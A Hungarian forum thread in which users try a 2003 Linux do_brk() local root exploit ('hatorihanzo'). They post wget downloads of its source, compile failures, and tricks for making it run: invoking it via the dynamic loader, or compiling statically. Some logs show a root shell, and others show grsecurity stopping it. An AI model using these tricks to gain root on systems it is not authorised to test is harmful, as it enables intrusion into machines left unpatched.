Hozzászólások
Hi.
A proof of concept exploit után megjelent egy újabb exploit is hatorihanzo néven, melyet Wojciech Purczynski írt, aki annak idején a ptrace/kmod bugra is írt exploitot.
Kipróbáltam ezt az új exploitot több gépen is, de mindenhol Segfaultolt...
Van valaki, akinél mást csinált?
- A hozzászóláshoz be kell jelentkezni
[quote:3a7a96fb11="hunger"]Hi.
A proof of concept exploit után megjelent egy újabb exploit is hatorihanzo néven, melyet Wojciech Purczynski írt, aki annak idején a ptrace/kmod bugra is írt exploitot.
Kipróbáltam ezt az új exploitot több gépen is, de mindenhol Segfaultolt...
Van valaki, akinél mást csinált?
Igen. Nalam peldaul le se fordul :-)
- A hozzászóláshoz be kell jelentkezni
[quote:5f3d272f68="trey"]
Igen. Nalam peldaul le se fordul :-)
Az mondjuk furcsa... Linux alatt próbáltad? :P
hunger@chichki:~$ wget http://hunger.hu/hatorihanzo.c
--08:25:32-- http://hunger.hu/hatorihanzo.c
=> `hatorihanzo.c'
Resolving hunger.hu... vége.
Connecting to hunger.hu[195.111.65.132]:80... connected.
HTTP kérés elküldve, várom a választ... 200 OK
Hossz: 6,510 [text/x-csrc]
100%[===================>] 6,510 6.21M/s ETA 00:00
08:25:32 (6.21 MB/s) - `hatorihanzo.c' lementve [6510/6510]
hunger@chichki:~$ gcc hatorihanzo.c -o hatorihanzo
hunger@chichki:~$ ./hatorihanzo
Segmentation fault
hunger@chichki:~$
- A hozzászóláshoz be kell jelentkezni
[quote:37eab29e3c="hunger"][quote:37eab29e3c="trey"]
Igen. Nalam peldaul le se fordul :-)
Az mondjuk furcsa... Linux alatt próbáltad? :P
Nem, windows alatt. Lehet, hogy az a baj?
trey@gmicsko03:~/devel/exploit$ wget http://hunger.hu/hatorihanzo.c
--08:58:44-- http://hunger.hu/hatorihanzo.c
=> `hatorihanzo.c'
IP keresés hunger.hu... 195.111.65.132
Csatlakozás hunger.hu[195.111.65.132]:80-hoz... kapcsolódva.
HTTP kérés elküldve, várom a választ... 200 OK
Hossz: 6,510 [text/x-csrc]
100%[==================>] 6,510 --.--K/s
08:58:44 (151.57 KB/s) - `hatorihanzo.c' lementve [6510/6510]
trey@gmicsko03:~/devel/exploit$ gcc hatorihanzo.c -o hatorihanzo
hatorihanzo.c: In function `ldt':
hatorihanzo.c:163: error: storage size of `l' isn't known
trey@gmicsko03:~/devel/exploit$ uname -a
Linux gmicsko03 2.6.0-test10 #2 Mon Nov 24 13:21:46 CET 2003 i686 GNU/Linux
trey@gmicsko03:~/devel/exploit$ gcc -v
Reading specs from /usr/lib/gcc-lib/i486-linux/3.3.2/specs
Configured with: ../src/configure -v --enable-languages=c,c++,java,f77,pascal,objc,ada,treelang --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.3 --enable-shared --with-system-zlib --enable-nls --without-included-gettext --enable-__cxa_atexit --enable-clocale=gnu --enable-debug --enable-java-gc=boehm --enable-java-awt=xlib --enable-objc-gc i486-linux
Thread model: posix
gcc version 3.3.2 (Debian)
- A hozzászóláshoz be kell jelentkezni
[quote:45ae197ea8="trey"]
Nem, windows alatt. Lehet, hogy az a baj?
Nemhiszem, elvégre nagyon hasonló a kettő... ;)
Próbáld cygwinnel, még talán administrator jogosultságot is kapsz... :D
Viccet félretéve, 3.3-as gcc-nél nekem se fordult le, 2.9-nél igen.
Kompatibilitás rulez. :?
Egyébként leforgatva is megtalálod itt.
- A hozzászóláshoz be kell jelentkezni
[quote:a0370d7808="hunger"][quote:a0370d7808="trey"]
Nem, windows alatt. Lehet, hogy az a baj?
Nemhiszem, elvégre nagyon hasonló a kettő... ;)
Próbáld cygwinnel, még talán administrator jogosultságot is kapsz... :D
Viccet félretéve, 3.3-as gcc-nél nekem se fordult le, 2.9-nél igen.
Kompatibilitás rulez. :?
Egyébként leforgatva is megtalálod itt.
Nekem is segfaultol, viszont a 2.95-os gcc-vel sem fordul le.
- A hozzászóláshoz be kell jelentkezni
[quote:c350fc29ae="trey"]
Nekem is segfaultol, viszont a 2.95-os gcc-vel sem fordul le.
Hát akkor maradjunk ennyiben... :)
- A hozzászóláshoz be kell jelentkezni
[quote:67324c097b="hunger"][quote:67324c097b="trey"]
Nekem is segfaultol, viszont a 2.95-os gcc-vel sem fordul le.
Hát akkor maradjunk ennyiben... :)
Inkább ne :lol:
cstamas@csthome:/tmp$ /lib/ld-linux.so.2 ./hatorihanzo
sh-2.05b#
szóval ha így hívod meg akkor OK.
Egy pillantra megijedtem mert még a hang is megállt 3sec-re.
Hunger! remélem nem tűztél bele egy backdoort is ;-)
Nagyon durva.... de mostmár lesz fegyverem amivel meggyőzök
egy-két rendszergazdit hogy upgrade! :twisted:
- A hozzászóláshoz be kell jelentkezni
Ahol már frissítettem:
[code:1:bea187d36e]cstamas@valahol:~/tmp$ /lib/ld-linux.so.2 ./hatorihanzo
[-] Unable to change page protection: Cannot allocate memory
[-] Unable to exit, entering neverending loop.
[2]+ Stopped /lib/ld-linux.so.2 ./hatorihanzo
cstamas@valahol:~/tmp$
[/code:1:bea187d36e]
És annak ellére hogy a grsec-sek is azt mondják hogy frissíteni kell a grsec mégis véd:
[code:1:bea187d36e]
cstamas@cosinus:/tmp$ /lib/ld-linux.so.2 ./hatorihanzo
Killed
cstamas@cosinus:/tmp$ /lib/ld-linux.so.2 ./hatorihanzo
[-] Unable to unmap stack: Invalid argument
[/code:1:bea187d36e]
syslogd:
[code:1:bea187d36e]
Dec 12 10:02:42 cosinus kernel: PAX: From 10.14.56.254: terminating task: <NULL>(ld-linux.so.2):76
0, uid/euid: 10032/10032, EIP: 0824938D, ESP: 5D2DA4E8
Dec 12 10:02:42 cosinus kernel: PAX: bytes at EIP: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00
[/code:1:bea187d36e]
Csak az egyiket fogta meg, bár egyik se müködött,
de az is lehet hogy egy másik exploit menne.
- A hozzászóláshoz be kell jelentkezni
Hunger!
azért ezek után a lefordított binárist letörölhetnéd,
tudod: script-kiddie protection.
- A hozzászóláshoz be kell jelentkezni
[quote:54b298535c="cstamas_"]
Inkább ne
cstamas@csthome:/tmp$ /lib/ld-linux.so.2 ./hatorihanzo
sh-2.05b#
szóval ha így hívod meg akkor OK.
[quote:54b298535c="cstamas_"]
azért ezek után a lefordított binárist letörölhetnéd,
tudod: script-kiddie protection.
Köszi a hozzászólást cstamas, nekem is eszembejut6ott volna így megpróbálni... örexem! :wink:
Binárist kérésedre letöröltem...
Najó csak átneveztem, de nem mondom meg mire :P
- A hozzászóláshoz be kell jelentkezni
[quote:5ee932143c="cstamas_"]
És annak ellére hogy a grsec-sek is azt mondják hogy frissíteni kell a grsec mégis véd:
Azért mondta a grsec csapat, hogy azellennemvéd, mert nagyban függ a grsec beállításoktól... Íme egy Low Securityre konfigurált grsec:
[code:1:5ee932143c]
hunger@mail:~$ /lib/ld-linux.so.2 ./hatorihanzo
sh-2.05a# id
uid=0(root) gid=0(root)
sh-2.05a# uname -a
Linux mail 2.4.22-grsec #1 SMP Fri Sep 12 16:02:01 EEST 2003 i686 unknown
[/code:1:5ee932143c]
- A hozzászóláshoz be kell jelentkezni
Azért mondta a grsec csapat, hogy azellennemvéd, mert nagyban függ a grsec beállításoktól... Íme egy Low Securityre konfigurált grsec:
Ok köszi ezt értem.
azért is mondtam hogy sztem lehet hogy akár nem csak grsec config
hanem exploit függö is.
De jó tudni kösz.
- A hozzászóláshoz be kell jelentkezni
[quote:e17e88c815="hunger"]Hi.
A proof of concept exploit után megjelent egy újabb exploit is hatorihanzo néven, melyet Wojciech Purczynski írt, aki annak idején a ptrace/kmod bugra is írt exploitot.
Kipróbáltam ezt az új exploitot több gépen is, de mindenhol Segfaultolt...
Van valaki, akinél mást csinált?
En kiprobaltam 5 gepen is, 2.4-es, 2.6-os kernelekkel, mindegyiken szinten elseggelt.
- A hozzászóláshoz be kell jelentkezni
ez a Hatori Hanso nem a Kill Bill-ben volt a faszi neve?
- A hozzászóláshoz be kell jelentkezni
[quote:e80a502406="hunger"]e öröm e bódottág ;)
szavasz. ez miben is volt?:)
- A hozzászóláshoz be kell jelentkezni
[quote:9ea48edf0c="snq-"]szavasz. ez miben is volt?:)
Matisz nagypapa... ;)
- A hozzászóláshoz be kell jelentkezni
[quote:e35c49a1ef="szogi"]En kiprobaltam 5 gepen is, 2.4-es, 2.6-os kernelekkel, mindegyiken szinten elseggelt.
Hemm, ez egy elég régi topic... (több mint 1 éves :)). A problémát 2003 december 1-én jelentette az isec.
A do_brk() exploit (hatorihanso.c) 2.4.23-ig játszik, fölötte és a 2.6 imho abszolút nem (2.2 se).
A -static kapcsolóval forgatva elég jól működött emlékeim szerint 2.4.23 és alatta lévő kerneleken. (Vagy az alternatív módszerrel, melyet cstamas írt, [static nélkül: /lib/ld-linux.so.2 ./hatorihanso])
- A hozzászóláshoz be kell jelentkezni
[quote:d6eb2c4170="trey"]ez a Hatori Hanso nem a Kill Bill-ben volt a faszi neve?
De! Illetve a kard márkája.
Végre sikerült megnézni a filmet, e öröm e bódottág ;)
- A hozzászóláshoz be kell jelentkezni
[quote:8a9e8f50aa="hunger"][quote:8a9e8f50aa="trey"]ez a Hatori Hanso nem a Kill Bill-ben volt a faszi neve?
De! Illetve a kard márkája.
Végre sikerült megnézni a filmet, e öröm e bódottág ;)
Inkább nézz el kedvenc oldalad tájára ;-)
______
cstamas
- A hozzászóláshoz be kell jelentkezni
[quote:1cbcc9337f="cstamas_"]
Inkább nézz el kedvenc oldalad tájára ;-)
______
cstamas
? Ööö, Nem értem... Melyikre gondolsz? :)
- A hozzászóláshoz be kell jelentkezni
Hattori Hanzo volt a kardkészítő. ha jól emlékszem. Várom a folytatást!
- A hozzászóláshoz be kell jelentkezni
Nekem se fordul le ez az assembly file:
# nasm do_brk.asm -o do_brk
do_brk.asm:4: error: attempt to set a negative program origin
Ti melyik kódot probáltátok legordítani? Amelyiket itt a fórumban `cat`-elt valamelyikőtök?
Üdv:
aThom
- A hozzászóláshoz be kell jelentkezni
[quote:b46088ec61="athom"]Nekem se fordul le ez az assembly file:
# nasm do_brk.asm -o do_brk
do_brk.asm:4: error: attempt to set a negative program origin
Ti melyik kódot probáltátok legordítani? Amelyiket itt a fórumban `cat`-elt valamelyikőtök?
Üdv:
aThom
Mi nem a PoC (Proof of Concept) exploitot próbáltuk, hanem az isec.pl-es srácok által kiadott root shell exploitot. (Egyébként működik mind a kettő, az is amit te próbáltál. Hogy neked miért nem fordult le az passz...)
- A hozzászóláshoz be kell jelentkezni
Nem tudom, mert még mindig nem néztem meg a filmet, pedig a Quentin Tarantino filmek nagyon bejövősek...
Viszont a témára visszatérve: állítólag ha -static opcióval fordítja az ember, akkor simán is megy a dolog... :-)
- A hozzászóláshoz be kell jelentkezni
[quote:db9d52b019="trey"]ez a Hatori Hanso nem a Kill Bill-ben volt a faszi neve?
jah igy hivtak a csokat aki csinalta a csajnak a kardot :-D
- A hozzászóláshoz be kell jelentkezni